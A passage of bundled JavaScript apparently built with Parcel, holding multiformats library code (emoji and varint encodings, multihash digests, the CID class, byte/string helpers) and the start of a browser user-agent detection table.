uD83D\uDC85\uD83E\uDDD0\uD83D\uDC3E\uD83C\uDF52\uD83D\uDE17\uD83E\uDD11\uD83C\uDF0A\uD83E\uDD2F\uD83D\uDC37☎\uD83D\uDCA7\uD83D\uDE2F\uD83D\uDC86\uD83D\uDC46\uD83C\uDFA4\uD83D\uDE47\uD83C\uDF51❄\uD83C\uDF34\uD83D\uDCA3\uD83D\uDC38\uD83D\uDC8C\uD83D\uDCCD\uD83E\uDD40\uD83E\uDD22\uD83D\uDC45\uD83D\uDCA1\uD83D\uDCA9\uD83D\uDC50\uD83D\uDCF8\uD83D\uDC7B\uD83E\uDD10\uD83E\uDD2E\uD83C\uDFBC\uD83E\uDD75\uD83D\uDEA9\uD83C\uDF4E\uD83C\uDF4A\uD83D\uDC7C\uD83D\uDC8D\uD83D\uDCE3\uD83E\uDD42");
const $c9e395f0a3e1277d$var$alphabetBytesToChars = $c9e395f0a3e1277d$var$alphabet.reduce((p, c, i)=>{
    p[i] = c;
    return p;
}, []);
const $c9e395f0a3e1277d$var$alphabetCharsToBytes = $c9e395f0a3e1277d$var$alphabet.reduce((p, c, i)=>{
    p[c.codePointAt(0)] = i;
    return p;
}, []);
function $c9e395f0a3e1277d$var$encode(data) {
    return data.reduce((p, c)=>{
        p += $c9e395f0a3e1277d$var$alphabetBytesToChars[c];
        return p;
    }, "");
}
function $c9e395f0a3e1277d$var$decode(str) {
    const byts = [];
    for (const char of str){
        const byt = $c9e395f0a3e1277d$var$alphabetCharsToBytes[char.codePointAt(0)];
        if (byt === undefined) throw new Error(`Non-base256emoji character: ${char}`);
        byts.push(byt);
    }
    return new Uint8Array(byts);
}
const $c9e395f0a3e1277d$var$base256emoji = $de6c852f920490b4$exports.from({
    prefix: "\uD83D\uDE80",
    name: "base256emoji",
    encode: $c9e395f0a3e1277d$var$encode,
    decode: $c9e395f0a3e1277d$var$decode
});
$c9e395f0a3e1277d$exports.base256emoji = $c9e395f0a3e1277d$var$base256emoji;


var $fc5536b924e664f3$exports = {};
"use strict";
Object.defineProperty($fc5536b924e664f3$exports, "__esModule", {
    value: true
});
var $baed353b52eedd46$exports = {};
"use strict";
Object.defineProperty($baed353b52eedd46$exports, "__esModule", {
    value: true
});
var $f302a42295b946b3$exports = {};
"use strict";
Object.defineProperty($f302a42295b946b3$exports, "__esModule", {
    value: true
});

var $32dd57f0aae68c66$exports = {};
"use strict";
Object.defineProperty($32dd57f0aae68c66$exports, "__esModule", {
    value: true
});
var $fa05a038af787ba8$exports = {};
"use strict";
var $fa05a038af787ba8$var$encode_1 = $fa05a038af787ba8$var$encode;
var $fa05a038af787ba8$var$MSB = 128, $fa05a038af787ba8$var$REST = 127, $fa05a038af787ba8$var$MSBALL = ~$fa05a038af787ba8$var$REST, $fa05a038af787ba8$var$INT = Math.pow(2, 31);
function $fa05a038af787ba8$var$encode(num, out, offset) {
    out = out || [];
    offset = offset || 0;
    var oldOffset = offset;
    while(num >= $fa05a038af787ba8$var$INT){
        out[offset++] = num & 255 | $fa05a038af787ba8$var$MSB;
        num /= 128;
    }
    while(num & $fa05a038af787ba8$var$MSBALL){
        out[offset++] = num & 255 | $fa05a038af787ba8$var$MSB;
        num >>>= 7;
    }
    out[offset] = num | 0;
    $fa05a038af787ba8$var$encode.bytes = offset - oldOffset + 1;
    return out;
}
var $fa05a038af787ba8$var$decode = $fa05a038af787ba8$var$read;
var $fa05a038af787ba8$var$MSB$1 = 128, $fa05a038af787ba8$var$REST$1 = 127;
function $fa05a038af787ba8$var$read(buf, offset) {
    var res = 0, offset = offset || 0, shift = 0, counter = offset, b, l = buf.length;
    do {
        if (counter >= l) {
            $fa05a038af787ba8$var$read.bytes = 0;
            throw new RangeError("Could not decode varint");
        }
        b = buf[counter++];
        res += shift < 28 ? (b & $fa05a038af787ba8$var$REST$1) << shift : (b & $fa05a038af787ba8$var$REST$1) * Math.pow(2, shift);
        shift += 7;
    }while (b >= $fa05a038af787ba8$var$MSB$1);
    $fa05a038af787ba8$var$read.bytes = counter - offset;
    return res;
}
var $fa05a038af787ba8$var$N1 = Math.pow(2, 7);
var $fa05a038af787ba8$var$N2 = Math.pow(2, 14);
var $fa05a038af787ba8$var$N3 = Math.pow(2, 21);
var $fa05a038af787ba8$var$N4 = Math.pow(2, 28);
var $fa05a038af787ba8$var$N5 = Math.pow(2, 35);
var $fa05a038af787ba8$var$N6 = Math.pow(2, 42);
var $fa05a038af787ba8$var$N7 = Math.pow(2, 49);
var $fa05a038af787ba8$var$N8 = Math.pow(2, 56);
var $fa05a038af787ba8$var$N9 = Math.pow(2, 63);
var $fa05a038af787ba8$var$length = function(value) {
    return value < $fa05a038af787ba8$var$N1 ? 1 : value < $fa05a038af787ba8$var$N2 ? 2 : value < $fa05a038af787ba8$var$N3 ? 3 : value < $fa05a038af787ba8$var$N4 ? 4 : value < $fa05a038af787ba8$var$N5 ? 5 : value < $fa05a038af787ba8$var$N6 ? 6 : value < $fa05a038af787ba8$var$N7 ? 7 : value < $fa05a038af787ba8$var$N8 ? 8 : value < $fa05a038af787ba8$var$N9 ? 9 : 10;
};
var $fa05a038af787ba8$var$varint = {
    encode: $fa05a038af787ba8$var$encode_1,
    decode: $fa05a038af787ba8$var$decode,
    encodingLength: $fa05a038af787ba8$var$length
};
var $fa05a038af787ba8$var$_brrp_varint = $fa05a038af787ba8$var$varint;
var $fa05a038af787ba8$var$varint$1 = $fa05a038af787ba8$var$_brrp_varint;
$fa05a038af787ba8$exports = $fa05a038af787ba8$var$varint$1;


const $32dd57f0aae68c66$var$decode = (data, offset = 0)=>{
    const code = $fa05a038af787ba8$exports.decode(data, offset);
    return [
        code,
        $fa05a038af787ba8$exports.decode.bytes
    ];
};
const $32dd57f0aae68c66$var$encodeTo = (int, target, offset = 0)=>{
    $fa05a038af787ba8$exports.encode(int, target, offset);
    return target;
};
const $32dd57f0aae68c66$var$encodingLength = (int)=>{
    return $fa05a038af787ba8$exports.encodingLength(int);
};
$32dd57f0aae68c66$exports.decode = $32dd57f0aae68c66$var$decode;
$32dd57f0aae68c66$exports.encodeTo = $32dd57f0aae68c66$var$encodeTo;
$32dd57f0aae68c66$exports.encodingLength = $32dd57f0aae68c66$var$encodingLength;


const $f302a42295b946b3$var$create = (code, digest)=>{
    const size = digest.byteLength;
    const sizeOffset = $32dd57f0aae68c66$exports.encodingLength(code);
    const digestOffset = sizeOffset + $32dd57f0aae68c66$exports.encodingLength(size);
    const bytes = new Uint8Array(digestOffset + size);
    $32dd57f0aae68c66$exports.encodeTo(code, bytes, 0);
    $32dd57f0aae68c66$exports.encodeTo(size, bytes, sizeOffset);
    bytes.set(digest, digestOffset);
    return new $f302a42295b946b3$var$Digest(code, size, digest, bytes);
};
const $f302a42295b946b3$var$decode = (multihash)=>{
    const bytes$1 = $4d55dbc11a5f1aec$exports.coerce(multihash);
    const [code, sizeOffset] = $32dd57f0aae68c66$exports.decode(bytes$1);
    const [size, digestOffset] = $32dd57f0aae68c66$exports.decode(bytes$1.subarray(sizeOffset));
    const digest = bytes$1.subarray(sizeOffset + digestOffset);
    if (digest.byteLength !== size) throw new Error("Incorrect length");
    return new $f302a42295b946b3$var$Digest(code, size, digest, bytes$1);
};
const $f302a42295b946b3$var$equals = (a, b)=>{
    if (a === b) return true;
    else return a.code === b.code && a.size === b.size && $4d55dbc11a5f1aec$exports.equals(a.bytes, b.bytes);
};
class $f302a42295b946b3$var$Digest {
    constructor(code, size, digest, bytes){
        this.code = code;
        this.size = size;
        this.digest = digest;
        this.bytes = bytes;
    }
}
$f302a42295b946b3$exports.Digest = $f302a42295b946b3$var$Digest;
$f302a42295b946b3$exports.create = $f302a42295b946b3$var$create;
$f302a42295b946b3$exports.decode = $f302a42295b946b3$var$decode;
$f302a42295b946b3$exports.equals = $f302a42295b946b3$var$equals;


const $baed353b52eedd46$var$from = ({ name: name, code: code, encode: encode })=>new $baed353b52eedd46$var$Hasher(name, code, encode);
class $baed353b52eedd46$var$Hasher {
    constructor(name, code, encode){
        this.name = name;
        this.code = code;
        this.encode = encode;
    }
    digest(input) {
        if (input instanceof Uint8Array) {
            const result = this.encode(input);
            return result instanceof Uint8Array ? $f302a42295b946b3$exports.create(this.code, result) : result.then((digest$1)=>$f302a42295b946b3$exports.create(this.code, digest$1));
        } else throw Error("Unknown type, must be binary type");
    }
}
$baed353b52eedd46$exports.Hasher = $baed353b52eedd46$var$Hasher;
$baed353b52eedd46$exports.from = $baed353b52eedd46$var$from;


const $fc5536b924e664f3$var$sha = (name)=>async (data)=>new Uint8Array(await crypto.subtle.digest(name, data));
const $fc5536b924e664f3$var$sha256 = $baed353b52eedd46$exports.from({
    name: "sha2-256",
    code: 18,
    encode: $fc5536b924e664f3$var$sha("SHA-256")
});
const $fc5536b924e664f3$var$sha512 = $baed353b52eedd46$exports.from({
    name: "sha2-512",
    code: 19,
    encode: $fc5536b924e664f3$var$sha("SHA-512")
});
$fc5536b924e664f3$exports.sha256 = $fc5536b924e664f3$var$sha256;
$fc5536b924e664f3$exports.sha512 = $fc5536b924e664f3$var$sha512;


var $60ad3b9242aa2ade$exports = {};
"use strict";
Object.defineProperty($60ad3b9242aa2ade$exports, "__esModule", {
    value: true
});


const $60ad3b9242aa2ade$var$code = 0;
const $60ad3b9242aa2ade$var$name = "identity";
const $60ad3b9242aa2ade$var$encode = $4d55dbc11a5f1aec$exports.coerce;
const $60ad3b9242aa2ade$var$digest = (input)=>$f302a42295b946b3$exports.create($60ad3b9242aa2ade$var$code, $60ad3b9242aa2ade$var$encode(input));
const $60ad3b9242aa2ade$var$identity = {
    code: $60ad3b9242aa2ade$var$code,
    name: $60ad3b9242aa2ade$var$name,
    encode: $60ad3b9242aa2ade$var$encode,
    digest: $60ad3b9242aa2ade$var$digest
};
$60ad3b9242aa2ade$exports.identity = $60ad3b9242aa2ade$var$identity;


var $00eb0d0ec1c470ae$exports = {};
"use strict";
Object.defineProperty($00eb0d0ec1c470ae$exports, "__esModule", {
    value: true
});

const $00eb0d0ec1c470ae$var$name = "raw";
const $00eb0d0ec1c470ae$var$code = 85;
const $00eb0d0ec1c470ae$var$encode = (node)=>$4d55dbc11a5f1aec$exports.coerce(node);
const $00eb0d0ec1c470ae$var$decode = (data)=>$4d55dbc11a5f1aec$exports.coerce(data);
$00eb0d0ec1c470ae$exports.code = $00eb0d0ec1c470ae$var$code;
$00eb0d0ec1c470ae$exports.decode = $00eb0d0ec1c470ae$var$decode;
$00eb0d0ec1c470ae$exports.encode = $00eb0d0ec1c470ae$var$encode;
$00eb0d0ec1c470ae$exports.name = $00eb0d0ec1c470ae$var$name;


var $5df44c55fa70023d$exports = {};
"use strict";
Object.defineProperty($5df44c55fa70023d$exports, "__esModule", {
    value: true
});
const $5df44c55fa70023d$var$textEncoder = new TextEncoder();
const $5df44c55fa70023d$var$textDecoder = new TextDecoder();
const $5df44c55fa70023d$var$name = "json";
const $5df44c55fa70023d$var$code = 512;
const $5df44c55fa70023d$var$encode = (node)=>$5df44c55fa70023d$var$textEncoder.encode(JSON.stringify(node));
const $5df44c55fa70023d$var$decode = (data)=>JSON.parse($5df44c55fa70023d$var$textDecoder.decode(data));
$5df44c55fa70023d$exports.code = $5df44c55fa70023d$var$code;
$5df44c55fa70023d$exports.decode = $5df44c55fa70023d$var$decode;
$5df44c55fa70023d$exports.encode = $5df44c55fa70023d$var$encode;
$5df44c55fa70023d$exports.name = $5df44c55fa70023d$var$name;


var $ce2f798d02e53aa4$exports = {};
"use strict";
Object.defineProperty($ce2f798d02e53aa4$exports, "__esModule", {
    value: true
});
var $75176e30f12252bd$exports = {};
"use strict";
Object.defineProperty($75176e30f12252bd$exports, "__esModule", {
    value: true
});





class $75176e30f12252bd$var$CID {
    constructor(version, code, multihash, bytes){
        this.code = code;
        this.version = version;
        this.multihash = multihash;
        this.bytes = bytes;
        this.byteOffset = bytes.byteOffset;
        this.byteLength = bytes.byteLength;
        this.asCID = this;
        this._baseCache = new Map();
        Object.defineProperties(this, {
            byteOffset: $75176e30f12252bd$var$hidden,
            byteLength: $75176e30f12252bd$var$hidden,
            code: $75176e30f12252bd$var$readonly,
            version: $75176e30f12252bd$var$readonly,
            multihash: $75176e30f12252bd$var$readonly,
            bytes: $75176e30f12252bd$var$readonly,
            _baseCache: $75176e30f12252bd$var$hidden,
            asCID: $75176e30f12252bd$var$hidden
        });
    }
    toV0() {
        switch(this.version){
            case 0:
                return this;
            default:
                {
                    const { code: code, multihash: multihash } = this;
                    if (code !== $75176e30f12252bd$var$DAG_PB_CODE) throw new Error("Cannot convert a non dag-pb CID to CIDv0");
                    if (multihash.code !== $75176e30f12252bd$var$SHA_256_CODE) throw new Error("Cannot convert non sha2-256 multihash CID to CIDv0");
                    return $75176e30f12252bd$var$CID.createV0(multihash);
                }
        }
    }
    toV1() {
        switch(this.version){
            case 0:
                {
                    const { code: code, digest: digest$1 } = this.multihash;
                    const multihash = $f302a42295b946b3$exports.create(code, digest$1);
                    return $75176e30f12252bd$var$CID.createV1(this.code, multihash);
                }
            case 1:
                return this;
            default:
                throw Error(`Can not convert CID version ${this.version} to version 0. This is a bug please report`);
        }
    }
    equals(other) {
        return other && this.code === other.code && this.version === other.version && $f302a42295b946b3$exports.equals(this.multihash, other.multihash);
    }
    toString(base) {
        const { bytes: bytes, version: version, _baseCache: _baseCache } = this;
        switch(version){
            case 0:
                return $75176e30f12252bd$var$toStringV0(bytes, _baseCache, base || $bb23e06a31e86f7c$exports.base58btc.encoder);
            default:
                return $75176e30f12252bd$var$toStringV1(bytes, _baseCache, base || $6d183b7418ac11d8$exports.base32.encoder);
        }
    }
    toJSON() {
        return {
            code: this.code,
            version: this.version,
            hash: this.multihash.bytes
        };
    }
    get [Symbol.toStringTag]() {
        return "CID";
    }
    [Symbol.for("nodejs.util.inspect.custom")]() {
        return "CID(" + this.toString() + ")";
    }
    static isCID(value) {
        $75176e30f12252bd$var$deprecate(/^0\.0/, $75176e30f12252bd$var$IS_CID_DEPRECATION);
        return !!(value && (value[$75176e30f12252bd$var$cidSymbol] || value.asCID === value));
    }
    get toBaseEncodedString() {
        throw new Error("Deprecated, use .toString()");
    }
    get codec() {
        throw new Error('"codec" property is deprecated, use integer "code" property instead');
    }
    get buffer() {
        throw new Error("Deprecated .buffer property, use .bytes to get Uint8Array instead");
    }
    get multibaseName() {
        throw new Error('"multibaseName" property is deprecated');
    }
    get prefix() {
        throw new Error('"prefix" property is deprecated');
    }
    static asCID(value) {
        if (value instanceof $75176e30f12252bd$var$CID) return value;
        else if (value != null && value.asCID === value) {
            const { version: version, code: code, multihash: multihash, bytes: bytes } = value;
            return new $75176e30f12252bd$var$CID(version, code, multihash, bytes || $75176e30f12252bd$var$encodeCID(version, code, multihash.bytes));
        } else if (value != null && value[$75176e30f12252bd$var$cidSymbol] === true) {
            const { version: version, multihash: multihash, code: code } = value;
            const digest$1 = $f302a42295b946b3$exports.decode(multihash);
            return $75176e30f12252bd$var$CID.create(version, code, digest$1);
        } else return null;
    }
    static create(version, code, digest) {
        if (typeof code !== "number") throw new Error("String codecs are no longer supported");
        switch(version){
            case 0:
                if (code !== $75176e30f12252bd$var$DAG_PB_CODE) throw new Error(`Version 0 CID must use dag-pb (code: ${$75176e30f12252bd$var$DAG_PB_CODE}) block encoding`);
                else return new $75176e30f12252bd$var$CID(version, code, digest, digest.bytes);
            case 1:
                {
                    const bytes = $75176e30f12252bd$var$encodeCID(version, code, digest.bytes);
                    return new $75176e30f12252bd$var$CID(version, code, digest, bytes);
                }
            default:
                throw new Error("Invalid version");
        }
    }
    static createV0(digest) {
        return $75176e30f12252bd$var$CID.create(0, $75176e30f12252bd$var$DAG_PB_CODE, digest);
    }
    static createV1(code, digest) {
        return $75176e30f12252bd$var$CID.create(1, code, digest);
    }
    static decode(bytes) {
        const [cid, remainder] = $75176e30f12252bd$var$CID.decodeFirst(bytes);
        if (remainder.length) throw new Error("Incorrect length");
        return cid;
    }
    static decodeFirst(bytes$1) {
        const specs = $75176e30f12252bd$var$CID.inspectBytes(bytes$1);
        const prefixSize = specs.size - specs.multihashSize;
        const multihashBytes = $4d55dbc11a5f1aec$exports.coerce(bytes$1.subarray(prefixSize, prefixSize + specs.multihashSize));
        if (multihashBytes.byteLength !== specs.multihashSize) throw new Error("Incorrect length");
        const digestBytes = multihashBytes.subarray(specs.multihashSize - specs.digestSize);
        const digest$1 = new $f302a42295b946b3$exports.Digest(specs.multihashCode, specs.digestSize, digestBytes, multihashBytes);
        const cid = specs.version === 0 ? $75176e30f12252bd$var$CID.createV0(digest$1) : $75176e30f12252bd$var$CID.createV1(specs.codec, digest$1);
        return [
            cid,
            bytes$1.subarray(specs.size)
        ];
    }
    static inspectBytes(initialBytes) {
        let offset = 0;
        const next = ()=>{
            const [i, length] = $32dd57f0aae68c66$exports.decode(initialBytes.subarray(offset));
            offset += length;
            return i;
        };
        let version = next();
        let codec = $75176e30f12252bd$var$DAG_PB_CODE;
        if (version === 18) {
            version = 0;
            offset = 0;
        } else if (version === 1) codec = next();
        if (version !== 0 && version !== 1) throw new RangeError(`Invalid CID version ${version}`);
        const prefixSize = offset;
        const multihashCode = next();
        const digestSize = next();
        const size = offset + digestSize;
        const multihashSize = size - prefixSize;
        return {
            version: version,
            codec: codec,
            multihashCode: multihashCode,
            digestSize: digestSize,
            multihashSize: multihashSize,
            size: size
        };
    }
    static parse(source, base) {
        const [prefix, bytes] = $75176e30f12252bd$var$parseCIDtoBytes(source, base);
        const cid = $75176e30f12252bd$var$CID.decode(bytes);
        cid._baseCache.set(prefix, source);
        return cid;
    }
}
const $75176e30f12252bd$var$parseCIDtoBytes = (source, base)=>{
    switch(source[0]){
        case "Q":
            {
                const decoder = base || $bb23e06a31e86f7c$exports.base58btc;
                return [
                    $bb23e06a31e86f7c$exports.base58btc.prefix,
                    decoder.decode(`${$bb23e06a31e86f7c$exports.base58btc.prefix}${source}`)
                ];
            }
        case $bb23e06a31e86f7c$exports.base58btc.prefix:
            {
                const decoder = base || $bb23e06a31e86f7c$exports.base58btc;
                return [
                    $bb23e06a31e86f7c$exports.base58btc.prefix,
                    decoder.decode(source)
                ];
            }
        case $6d183b7418ac11d8$exports.base32.prefix:
            {
                const decoder = base || $6d183b7418ac11d8$exports.base32;
                return [
                    $6d183b7418ac11d8$exports.base32.prefix,
                    decoder.decode(source)
                ];
            }
        default:
            if (base == null) throw Error("To parse non base32 or base58btc encoded CID multibase decoder must be provided");
            return [
                source[0],
                base.decode(source)
            ];
    }
};
const $75176e30f12252bd$var$toStringV0 = (bytes, cache, base)=>{
    const { prefix: prefix } = base;
    if (prefix !== $bb23e06a31e86f7c$exports.base58btc.prefix) throw Error(`Cannot string encode V0 in ${base.name} encoding`);
    const cid = cache.get(prefix);
    if (cid == null) {
        const cid = base.encode(bytes).slice(1);
        cache.set(prefix, cid);
        return cid;
    } else return cid;
};
const $75176e30f12252bd$var$toStringV1 = (bytes, cache, base)=>{
    const { prefix: prefix } = base;
    const cid = cache.get(prefix);
    if (cid == null) {
        const cid = base.encode(bytes);
        cache.set(prefix, cid);
        return cid;
    } else return cid;
};
const $75176e30f12252bd$var$DAG_PB_CODE = 112;
const $75176e30f12252bd$var$SHA_256_CODE = 18;
const $75176e30f12252bd$var$encodeCID = (version, code, multihash)=>{
    const codeOffset = $32dd57f0aae68c66$exports.encodingLength(version);
    const hashOffset = codeOffset + $32dd57f0aae68c66$exports.encodingLength(code);
    const bytes = new Uint8Array(hashOffset + multihash.byteLength);
    $32dd57f0aae68c66$exports.encodeTo(version, bytes, 0);
    $32dd57f0aae68c66$exports.encodeTo(code, bytes, codeOffset);
    bytes.set(multihash, hashOffset);
    return bytes;
};
const $75176e30f12252bd$var$cidSymbol = Symbol.for("@ipld/js-cid/CID");
const $75176e30f12252bd$var$readonly = {
    writable: false,
    configurable: false,
    enumerable: true
};
const $75176e30f12252bd$var$hidden = {
    writable: false,
    enumerable: false,
    configurable: false
};
const $75176e30f12252bd$var$version = "0.0.0-dev";
const $75176e30f12252bd$var$deprecate = (range, message)=>{
    if (range.test($75176e30f12252bd$var$version)) console.warn(message);
    else throw new Error(message);
};
const $75176e30f12252bd$var$IS_CID_DEPRECATION = `CID.isCID(v) is deprecated and will be removed in the next major release.
Following code pattern:

if (CID.isCID(value)) {
  doSomethingWithCID(value)
}

Is replaced with:

const cid = CID.asCID(value)
if (cid) {
  // Make sure to use cid instead of value
  doSomethingWithCID(cid)
}
`;
$75176e30f12252bd$exports.CID = $75176e30f12252bd$var$CID;






$ce2f798d02e53aa4$exports.CID = $75176e30f12252bd$exports.CID;
$ce2f798d02e53aa4$exports.varint = $32dd57f0aae68c66$exports;
$ce2f798d02e53aa4$exports.bytes = $4d55dbc11a5f1aec$exports;
$ce2f798d02e53aa4$exports.hasher = $baed353b52eedd46$exports;
$ce2f798d02e53aa4$exports.digest = $f302a42295b946b3$exports;







const $b633fa38a7f8a649$var$bases = {
    ...$fab4e33fc8c0336e$exports,
    ...$444f725972ab843c$exports,
    ...$7330be652d1faeae$exports,
    ...$7c7f7dd3c1547a66$exports,
    ...$4e3d0e6f3707af45$exports,
    ...$6d183b7418ac11d8$exports,
    ...$2478ed668ff199ad$exports,
    ...$bb23e06a31e86f7c$exports,
    ...$de0d70bb34ca5e4e$exports,
    ...$c9e395f0a3e1277d$exports
};
const $b633fa38a7f8a649$var$hashes = {
    ...$fc5536b924e664f3$exports,
    ...$60ad3b9242aa2ade$exports
};
const $b633fa38a7f8a649$var$codecs = {
    raw: $00eb0d0ec1c470ae$exports,
    json: $5df44c55fa70023d$exports
};
$b633fa38a7f8a649$exports.CID = $75176e30f12252bd$exports.CID;
$b633fa38a7f8a649$exports.hasher = $baed353b52eedd46$exports;
$b633fa38a7f8a649$exports.digest = $f302a42295b946b3$exports;
$b633fa38a7f8a649$exports.varint = $32dd57f0aae68c66$exports;
$b633fa38a7f8a649$exports.bytes = $4d55dbc11a5f1aec$exports;
$b633fa38a7f8a649$exports.bases = $b633fa38a7f8a649$var$bases;
$b633fa38a7f8a649$exports.codecs = $b633fa38a7f8a649$var$codecs;
$b633fa38a7f8a649$exports.hashes = $b633fa38a7f8a649$var$hashes;



function $5884b53a084a924d$var$createCodec(name, prefix, encode, decode) {
    return {
        name: name,
        prefix: prefix,
        encoder: {
            name: name,
            prefix: prefix,
            encode: encode
        },
        decoder: {
            decode: decode
        }
    };
}
const $5884b53a084a924d$var$string = $5884b53a084a924d$var$createCodec("utf8", "u", (buf)=>{
    const decoder = new TextDecoder("utf8");
    return "u" + decoder.decode(buf);
}, (str)=>{
    const encoder = new TextEncoder();
    return encoder.encode(str.substring(1));
});
const $5884b53a084a924d$var$ascii = $5884b53a084a924d$var$createCodec("ascii", "a", (buf)=>{
    let string = "a";
    for(let i = 0; i < buf.length; i++)string += String.fromCharCode(buf[i]);
    return string;
}, (str)=>{
    str = str.substring(1);
    const buf = $6082a548169c7b42$exports.allocUnsafe(str.length);
    for(let i = 0; i < str.length; i++)buf[i] = str.charCodeAt(i);
    return buf;
});
const $5884b53a084a924d$var$BASES = {
    utf8: $5884b53a084a924d$var$string,
    "utf-8": $5884b53a084a924d$var$string,
    hex: $b633fa38a7f8a649$exports.bases.base16,
    latin1: $5884b53a084a924d$var$ascii,
    ascii: $5884b53a084a924d$var$ascii,
    binary: $5884b53a084a924d$var$ascii,
    ...$b633fa38a7f8a649$exports.bases
};
$5884b53a084a924d$exports = $5884b53a084a924d$var$BASES;



function $a4ed053a1131469e$var$fromString(string, encoding = "utf8") {
    const base = $5884b53a084a924d$exports[encoding];
    if (!base) throw new Error(`Unsupported encoding "${encoding}"`);
    if ((encoding === "utf8" || encoding === "utf-8") && globalThis.Buffer != null && globalThis.Buffer.from != null) return $784ac8dd0f23c14d$exports.asUint8Array(globalThis.Buffer.from(string, "utf-8"));
    return base.decoder.decode(`${base.prefix}${string}`);
}
$a4ed053a1131469e$exports.fromString = $a4ed053a1131469e$var$fromString;


var $bdf44057d833ab1f$exports = {};
"use strict";
Object.defineProperty($bdf44057d833ab1f$exports, "__esModule", {
    value: true
});

function $bdf44057d833ab1f$var$toString(array, encoding = "utf8") {
    const base = $5884b53a084a924d$exports[encoding];
    if (!base) throw new Error(`Unsupported encoding "${encoding}"`);
    if ((encoding === "utf8" || encoding === "utf-8") && globalThis.Buffer != null && globalThis.Buffer.from != null) return globalThis.Buffer.from(array.buffer, array.byteOffset, array.byteLength).toString("utf8");
    return base.encoder.encode(array).substring(1);
}
$bdf44057d833ab1f$exports.toString = $bdf44057d833ab1f$var$toString;


var $61fd98a3451cab50$exports = {};
"use strict";
Object.defineProperty($61fd98a3451cab50$exports, "__esModule", {
    value: true
});


function $61fd98a3451cab50$var$xor(a, b) {
    if (a.length !== b.length) throw new Error("Inputs should have the same length");
    const result = $6082a548169c7b42$exports.allocUnsafe(a.length);
    for(let i = 0; i < a.length; i++)result[i] = a[i] ^ b[i];
    return $784ac8dd0f23c14d$exports.asUint8Array(result);
}
$61fd98a3451cab50$exports.xor = $61fd98a3451cab50$var$xor;


$74e9859baf4497ef$exports.compare = $3a397656998e9fe7$exports.compare;
$74e9859baf4497ef$exports.concat = $475c4a512fd4a246$exports.concat;
$74e9859baf4497ef$exports.equals = $41b0be3b2401ec7e$exports.equals;
$74e9859baf4497ef$exports.fromString = $a4ed053a1131469e$exports.fromString;
$74e9859baf4497ef$exports.toString = $bdf44057d833ab1f$exports.toString;
$74e9859baf4497ef$exports.xor = $61fd98a3451cab50$exports.xor;


var $48968958eb8b72e8$exports = {};

$parcel$export($48968958eb8b72e8$exports, "detect", () => $48968958eb8b72e8$export$17b446b869dad473);

var $hPtJY = parcelRequire("hPtJY");
var $48968958eb8b72e8$var$__spreadArray = undefined && undefined.__spreadArray || function(to, from, pack) {
    if (pack || arguments.length === 2) {
        for(var i = 0, l = from.length, ar; i < l; i++)if (ar || !(i in from)) {
            if (!ar) ar = Array.prototype.slice.call(from, 0, i);
            ar[i] = from[i];
        }
    }
    return to.concat(ar || Array.prototype.slice.call(from));
};
var $48968958eb8b72e8$export$8fa985da04a86f0 = /** @class */ function() {
    function BrowserInfo(name, version, os) {
        this.name = name;
        this.version = version;
        this.os = os;
        this.type = "browser";
    }
    return BrowserInfo;
}();
var $48968958eb8b72e8$export$62457c674e0167c0 = /** @class */ function() {
    function NodeInfo(version) {
        this.version = version;
        this.type = "node";
        this.name = "node";
        this.os = $hPtJY.platform;
    }
    return NodeInfo;
}();
var $48968958eb8b72e8$export$775de176f06fc21 = /** @class */ function() {
    function SearchBotDeviceInfo(name, version, os, bot) {
        this.name = name;
        this.version = version;
        this.os = os;
        this.bot = bot;
        this.type = "bot-device";
    }
    return SearchBotDeviceInfo;
}();
var $48968958eb8b72e8$export$cb435e1e9f86c1ff = /** @class */ function() {
    function BotInfo() {
        this.type = "bot";
        this.bot = true; // NOTE: deprecated test name instead
        this.name = "bot";
        this.version = null;
        this.os = null;
    }
    return BotInfo;
}();
var $48968958eb8b72e8$export$7c78fe95a9d9b03e = /** @class */ function() {
    function ReactNativeInfo() {
        this.type = "react-native";
        this.name = "react-native";
        this.version = null;
        this.os = null;
    }
    return ReactNativeInfo;
}();
// tslint:disable-next-line:max-line-length
var $48968958eb8b72e8$var$SEARCHBOX_UA_REGEX = /alexa|bot|crawl(er|ing)|facebookexternalhit|feedburner|google web preview|nagios|postrank|pingdom|slurp|spider|yahoo!|yandex/;
var $48968958eb8b72e8$var$SEARCHBOT_OS_REGEX = /(nuhk|curl|Googlebot|Yammybot|Openbot|Slurp|MSNBot|Ask\ Jeeves\/Teoma|ia_archiver)/;
var $48968958eb8b72e8$var$REQUIRED_VERSION_PARTS = 3;
var $48968958eb8b72e8$var$userAgentRules = [
    [
        "aol",
        /AOLShield\/([0-9\._]+)/
    ],
    [
        "edge",
        /Edge\/([0-9\._]+)/
    ],
    [
        "edge-ios",
        /EdgiOS\/([0-9\._]+)/
    ],
    [
        "yandexbrowser",
        /YaBrowser\/([0-9\._]+)/
    ],
    [
        "kakaotalk",
        /KAKAOTALK\s([0-9\.]+)/
    ],
    [
        "samsung",
        /SamsungBrowser\/([0-9\.]+)/
    ],
    [
        "silk",
        /\bSilk\/([0-9._-]+)\b/
    ],
    [
        "miui",
        /MiuiBrowser\/([0-9\.]+)$/
    ],
    [
        "beaker",
        /BeakerBrowser\/([0-9\.]+)/
    ],
    [
        "edge-chromium",
        /EdgA?\/([0-9\.]+)/
    ],
    [
        "chromium-webview",
        /(?!Chrom.*OPR)wv\).*Chrom(?:e|ium)\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "chrome",
        /(?!Chrom.*OPR)Chrom(?:e|ium)\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "phantomjs",
        /PhantomJS\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "crios",
        /CriOS\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "firefox",
        /Firefox\/([0-9\.]+)(?:\s|$)/
    ],
    [
        "fxios",
        /FxiOS\/([0-9\.]+)/
    ],
    [
        "opera-mini",
        /Opera Mini.*Version\/([0-9\.]+)/
    ],
    [
        "opera",
        /Opera\/([0-9\.]+)(?:\s|$)/
    ],
    [
        "opera",
        /OPR\/([0-9\.]+)(:?\s|$)/
    ],
    [
        "pie",
        /^Microsoft Pocket Internet Explorer\/(\d+\.\d+)$/
    ],
    [
        "pie",
        /^Mozilla\/\d\.\d+\s\(compatible;\s(?:MSP?IE|MSInternet Explorer) (\d+\.\d+);.*Windows CE.*\)$/
    ],
    [
        "netfront",
        /^Mozilla\/\d\.\d+.*NetFront\/(\d.\d)/
    ],
    [
        "ie",
        /Trident\/7\.0.*rv\:([0-9\.]+).*\).*Gecko$/
    ],
    [
        "ie",
